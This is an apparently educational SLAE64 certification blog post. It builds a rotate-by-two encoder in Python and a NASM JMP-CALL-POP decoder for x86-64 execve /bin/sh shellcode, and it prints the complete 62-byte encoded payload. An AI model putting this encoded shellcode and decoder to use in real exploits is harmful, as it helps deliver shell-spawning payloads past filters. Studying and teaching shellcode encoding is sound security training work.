This post is a continuation of a seven (7) part blog series as part of the SLAE64 certification challenge. You can read the previous blog posts using the links below.
Previous Posts:
The requirements for Assignment 4 are as follows:
- Create a Custom encoding scheme like the "Insertion Encoder" we showed you
- PoC with using execve-stack as the shellcode to encode with your schema and execute
Supplemental scripts for this assignment can be found here: https://github.com/blu3gl0w13/SLAE64/tree/master/scripts.
For this one, we re-used a nice python script we made for SLAE32 based off of a function found here: http://www.falatic.com/index.php/108/python-and-bitwise-rotation
We did this because Python has no built-in bitwise rotation operator, only the shifts << and >>. It winds up working out really well actually. This script defines two (2) functions: ror for rotate right, and rol for rotate left. Both treat the value as a single 8-bit byte. We'll use the ror function to rotate every byte of our shellcode right by 2 bits. When we write our decoder in NASM, we'll need to perform the opposite operation and rotate each encoded byte two (2) bits left using the ROL instruction, so that we return our shellcode to its original working state.
#!/usr/bin/env python
#-----------------------------------------------------------------------------
#
# encoder.py
# by Michael Born (@blu3gl0w13)
# Student-ID: SLAE64-1439
# November 8, 2016
#
#----------------------------------------------------------------------------

# handle our imports
import sys

#-------------------------------------------------------------------
# The following Bitwise rotation functions
# have been translated from the following blog
# http://www.falatic.com/index.php/108/python-and-bitwise-rotation
#-------------------------------------------------------------------

def ror(valueToBeRotated, rotateAmount):
    # rotate an 8-bit value right; bits shifted out on the right re-enter on the left
    return (((valueToBeRotated & 0xff) >> (rotateAmount % 8)) |
            ((valueToBeRotated << (8 - (rotateAmount % 8))) & 0xff))

def rol(valueToBeRotated, rotateAmount):
    # rotate an 8-bit value left; bits shifted out on the left re-enter on the right
    return (((valueToBeRotated << (rotateAmount % 8)) & 0xff) |
            ((valueToBeRotated & 0xff) >> (8 - (rotateAmount % 8))))

# execve-stack shellcode; the b"" prefix keeps this a byte string on Python 2 and 3
shellcode = (b"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53"
             b"\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")

encshellcode = ""
encshellcode2 = ""

# bytearray yields each byte as an integer
for i in bytearray(shellcode):
    x = ror(i, 2)
    #x = i >> 2
    encshellcode += "\\x%02x," % x    # \x12,\x4c,... form
    encshellcode2 += "0x%02x," % x    # 0x12,0x4c,... form for the NASM db line

print("\n\nEncoded Shellcode: %s" % encshellcode)
print("Encoded Shellcode 2: %s\n\n" % encshellcode2)
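When we run encoder.py to encode our Execve shellcode we get the output in Figure 1. This is excellent because the output contains no NULL bytes. That matters because NULL bytes are usually bad characters when shellcode is delivered through an exploit. A rotation can only produce 0x00 from a 0x00 input byte, so the encoding never introduces NULL bytes that weren't already there.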
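As a quick sanity check on the encoder output, here is a minimal sketch written for Python 3. It is not part of the original scripts: the ror and rol helpers are re-implemented in a compact form, and the names encoded, decoded, has_null and round_trip_ok are made up for this illustration. It re-derives the encoded bytes, confirms none of them is NULL, and confirms that rotating left by 2 undoes the encoding.

```python
# Sketch (Python 3): re-derive the encoded bytes and sanity-check them.
# The helper and variable names are illustrative, not taken from encoder.py.

def ror(value, amount):
    """Rotate an 8-bit value right by `amount` bits."""
    amount %= 8
    value &= 0xff
    return ((value >> amount) | (value << (8 - amount))) & 0xff

def rol(value, amount):
    """Rotate an 8-bit value left by `amount` bits."""
    amount %= 8
    value &= 0xff
    return ((value << amount) | (value >> (8 - amount))) & 0xff

# The execve-stack shellcode used in encoder.py, written as hex.
shellcode = bytes.fromhex(
    "4831c05048bb2f62696e2f2f736853"
    "4889e7504889e2574889e64883c03b0f05"
)

encoded = bytes(ror(b, 2) for b in shellcode)   # what the encoder emits
decoded = bytes(rol(b, 2) for b in encoded)     # what the decoder must recover

has_null = 0 in encoded
round_trip_ok = decoded == shellcode

print(", ".join("0x%02x" % b for b in encoded))
print("NULL bytes present:", has_null)
print("round trip ok:", round_trip_ok)
```

The comma-separated line it prints can be compared directly against the db line in the decoder.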
Now that we've gotten our encoder.py written and working, we can focus on writing our decoder. It definitely doesn't have to be very long either. For this one, we'll employ the JMP, CALL, POP technique to dynamically retrieve the address of our encoded shellcode. We first JMP to our shellcode label, then CALL our decoder label. This has the effect of pushing the address of encShellcode onto the stack when the CALL happens. That's because CALL pushes its return address, which is the address of whatever immediately follows the CALL instruction (the value RIP holds at that moment), and we placed encShellcode directly after the CALL. Pretty cool right?
Our first instruction in our decoder block is to POP that address off of the stack into RSI. This is for easy reference later as we loop through our decode instructions. We'll next zero RCX using an XOR instruction, and then copy the length of our encShellcode into CL. Remember, the LOOP instruction uses RCX as its counter. We only want to loop over the length of our encoded shellcode so that we don't accidentally overwrite adjacent areas of memory. Finally, to finish our decoder section, we'll zero RDX in order to use it as a temporary holder for each byte of our encoded shellcode.
Our decode block actually handles the decoding. We move one byte at a time into DL, rotate it left two positions, and then write it back to the location pointed to by RSI. We then increase the address in RSI by one and use the LOOP instruction to start the process over again. LOOP decrements RCX and jumps back to decode as long as RCX isn't zero; it neither tests nor changes ZF. Once RCX reaches zero, execution falls through to the JMP SHORT, which lands in our now decoded shellcode.
;-------------------------------
; decoder-execve.nasm
; by Michael Born (@blu3gl0w13)
; November 8, 2016
; Student ID: SLAE64-1439
;-------------------------------

global _start

section .text

_start:
    ; JMP CALL POP
    ; to get address of our
    ; encoded shellcode
    jmp shellcode

decoder:
    pop rsi                 ; RSI = address of encShellcode (pushed by CALL)
    xor rcx, rcx
    mov cl, shellLen        ; RCX = number of bytes to decode
    xor rdx, rdx

decode:
    mov dl, byte [rsi]      ; fetch one encoded byte
    rol dl, 0x2             ; undo the encoder's rotate right by 2
    mov byte [rsi], dl      ; write the decoded byte back in place
    inc rsi
    loop decode             ; dec RCX, repeat while RCX != 0
    jmp short encShellcode  ; run the decoded shellcode

shellcode:
    call decoder            ; pushes the address of encShellcode
    encShellcode: db 0x12,0x4c,0x30,0x14,0x12,0xee,0xcb,0x98,0x5a,0x9b,0xcb,0xcb,\
                     0xdc,0x1a,0xd4,0x12,0x62,0xf9,0x14,0x12,0x62,0xb8,0xd5,0x12,0x62,0xb9,0x12,0xe0,0x30,0xce,0xc3,0x41
    shellLen: equ $-encShellcode
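To make the control flow of the decode loop easier to follow, here is a rough register-level model of it in Python 3. This is only a sketch for illustration: run_decoder and its parameters are hypothetical names, memory is modelled as a bytearray, and it assumes a non-zero length (as in our case, where shellLen is 32).

```python
# Sketch (Python 3): a register-level model of the decode loop.
# rsi, rcx and dl mirror the registers; run_decoder is a hypothetical name.

def run_decoder(memory, start, length):
    """Decode `length` bytes of `memory` in place, beginning at `start`."""
    rsi = start                                # pop rsi
    rcx = length                               # xor rcx, rcx / mov cl, shellLen
    while True:
        dl = memory[rsi]                       # mov dl, byte [rsi]
        dl = ((dl << 2) | (dl >> 6)) & 0xff    # rol dl, 0x2
        memory[rsi] = dl                       # mov byte [rsi], dl
        rsi += 1                               # inc rsi
        rcx -= 1                               # loop: decrement RCX ...
        if rcx == 0:                           # ... and fall through at zero
            break
    return rsi                                 # first address past the decoded bytes

# The encoded bytes from the db line in decoder-execve.nasm.
enc = bytearray.fromhex(
    "124c301412eecb985a9bcbcbdc1ad412"
    "62f9141262b8d51262b912e030cec341"
)

end = run_decoder(enc, 0, len(enc))
print(enc.hex())
```

Note that the exit condition depends only on the counter, which matches how LOOP behaves: no flags are involved.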
Here's what the decoder shellcode looks like. Notice any NULL bytes? You shouldn't because we were extra careful to make sure no NULL bytes made it into our decoder.
"\xeb\x17\x5e\x48\x31\xc9\xb1\x20\x48\x31\xd2\x8a\x16\xc0\xc2\x02\x88\x16\x48\xff\xc6"
"\xe2\xf4\xeb\x05\xe8\xe4\xff\xff\xff\x12\x4c\x30\x14\x12\xee\xcb\x98\x5a\x9b\xcb\xcb"
"\xdc\x1a\xd4\x12\x62\xf9\x14\x12\x62\xb8\xd5\x12\x62\xb9\x12\xe0\x30\xce\xc3\x41"
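The bytes above can also be checked mechanically. The following Python 3 sketch is an illustration only; the helper names rel8_target and rel32_target are invented here, and the instruction offsets are counted by hand from the listing. It confirms the total length, confirms there are no NULL bytes, and resolves the relative displacements of the JMP, LOOP and CALL instructions back to the labels they should reach.

```python
# Sketch (Python 3): inspect the final decoder shellcode.
# Offsets are hand-counted from the listing; helper names are illustrative.
import struct

payload = (
    b"\xeb\x17\x5e\x48\x31\xc9\xb1\x20\x48\x31\xd2\x8a\x16\xc0\xc2\x02\x88\x16\x48\xff\xc6"
    b"\xe2\xf4\xeb\x05\xe8\xe4\xff\xff\xff\x12\x4c\x30\x14\x12\xee\xcb\x98\x5a\x9b\xcb\xcb"
    b"\xdc\x1a\xd4\x12\x62\xf9\x14\x12\x62\xb8\xd5\x12\x62\xb9\x12\xe0\x30\xce\xc3\x41"
)

def rel8_target(offset):
    """Target of a 2-byte instruction (opcode + signed 8-bit displacement)."""
    disp = struct.unpack_from("b", payload, offset + 1)[0]
    return offset + 2 + disp

def rel32_target(offset):
    """Target of a 5-byte instruction (opcode + signed 32-bit displacement)."""
    disp = struct.unpack_from("<i", payload, offset + 1)[0]
    return offset + 5 + disp

length = len(payload)
has_null = b"\x00" in payload

jmp_target = rel8_target(0)      # jmp shellcode        -> the CALL
loop_target = rel8_target(21)    # loop decode          -> mov dl, byte [rsi]
exit_target = rel8_target(23)    # jmp short encShellcode
call_target = rel32_target(25)   # call decoder         -> pop rsi
return_address = 25 + 5          # what CALL pushes: start of encShellcode
counter = payload[7]             # immediate of mov cl, shellLen

print("length:", length, "NULL bytes:", has_null)
print("jmp ->", jmp_target, "loop ->", loop_target,
      "exit ->", exit_target, "call ->", call_target)
print("encoded bytes start at", return_address, "count", counter)
```

The address CALL pushes and the target of the final JMP SHORT are the same offset, which is the whole point of JMP, CALL, POP: the decoder both finds and later executes the bytes that follow the CALL.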
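When we assemble, link, and run decoder-execve.nasm on its own we get a Segmentation Fault. Why is that? It's because we're trying to write to read-only memory! Our encoded shellcode lives in the .text section, which is mapped readable and executable but not writable, and the decoder writes each decoded byte back in place. Look at Figure 2 below and see that as soon as we try to execute MOV byte [RSI], dl the program freaks out.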

How can we take care of this? One way is to dump the shellcode bytes from our assembled decoder-execve binary and put them into a C program. We'll then compile the C program so that the writable memory holding our shellcode, which normally can't be executed, is allowed to execute. This way the decoder can write to its own bytes and we can test to see if our shellcode works. And guess what? It does! And, probably the best part, it's only 62 bytes: 30 bytes of decoder plus 32 bytes of encoded shellcode. Fantastic.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert 64-bit certification:
http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html
Student ID: SLAE64 - 1439
Next: SLAE64 - Assignment 5